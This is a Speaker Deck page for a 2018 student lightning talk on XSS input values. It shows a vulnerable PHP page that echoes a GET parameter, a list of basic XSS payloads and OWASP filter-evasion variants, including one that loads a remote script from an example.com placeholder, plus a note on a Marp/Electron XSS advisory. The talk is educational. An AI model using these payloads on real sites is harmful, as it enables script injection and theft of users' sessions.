Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.5k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Query Prediction for Log Search for Distributed Tracing with External Monitoring Alerts
tomoyk
0
9
Root Cause Analysis for Middleware Issues by Kubernetes Resource Events / KST-2026
tomoyk
0
17
Reading HTTP Client Hints
tomoyk
0
120
Log message with JSON item count for root cause analysis in microservices
tomoyk
1
240
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
370
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
450
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
1
1k
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
420
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
200
Other Decks in Technology
See All in Technology
ブログの作成に音声AIツールを使って音声入力しようとした話
smt7174
1
150
Claude Codeで実践するスペック駆動開発入門 / sdd-with-claude_code
yoshidashingo
2
4.1k
Three-Legged OAuth in AgentCore Gateway
hironobuiga
2
160
技術書を出版するまでの1161時間50分38秒
kakeami
0
150
LLMOpsのこれまでとこれからを学ぶ
nsakki55
2
660
『誰の責任?』で揉めるのをやめて、エラーバジェットで判断するようにした ~感情論をデータで終わらせる、PMとエンジニアの意思決定プロセス~
coconala_engineer
0
1.7k
Interop Tokyo 2025 ShowNet Team Memberで学んだSRv6を基礎から丁寧に
miyukichi_ospf
0
140
AIエージェントのメモリについて
shibuiwilliam
0
380
Intro SAGA Event Space
midnight480
0
140
AIで「ふとした疑問」を即座に検証する 〜定量で圧倒するN1理解〜
kakehashi
PRO
3
700
個人的3D Gaussian Splattingニュースをご紹介 / sharing 3d gaussian splatting news
drumath2237
0
290
量子クラウドシステムと運用
oqtopus
0
200
Featured
See All Featured
Save Time (by Creating Custom Rails Generators)
garrettdimon
PRO
32
2.3k
Building a Modern Day E-commerce SEO Strategy
aleyda
45
8.7k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
249
1.3M
The #1 spot is gone: here's how to win anyway
tamaranovitovic
2
960
Side Projects
sachag
455
43k
Information Architects: The Missing Link in Design Systems
soysaucechin
0
800
Optimising Largest Contentful Paint
csswizardry
37
3.6k
Public Speaking Without Barfing On Your Shoes - THAT 2023
reverentgeek
1
320
Practical Orchestrator
shlominoach
191
11k
The Organizational Zoo: Understanding Human Behavior Agility Through Metaphoric Constructive Conversations (based on the works of Arthur Shelley, Ph.D)
kimpetersen
PRO
0
250
Effective software design: The role of men in debugging patriarchy in IT @ Voxxed Days AMS
baasie
0
240
The SEO identity crisis: Don't let AI make you average
varn
0
400
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron
tomoyk
smt7174
yoshidashingo
hironobuiga
kakeami
nsakki55
coconala_engineer
miyukichi_ospf
shibuiwilliam
midnight480
kakehashi
drumath2237
oqtopus
garrettdimon
aleyda
sugarenia
tamaranovitovic
sachag
soysaucechin
csswizardry
reverentgeek
shlominoach
kimpetersen
baasie
varn
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_3.jpg){kind=link}
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_4.jpg){kind=link}
![[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_13.jpg){kind=link}
![[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_14.jpg){kind=link}
![[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_15.jpg){kind=link}
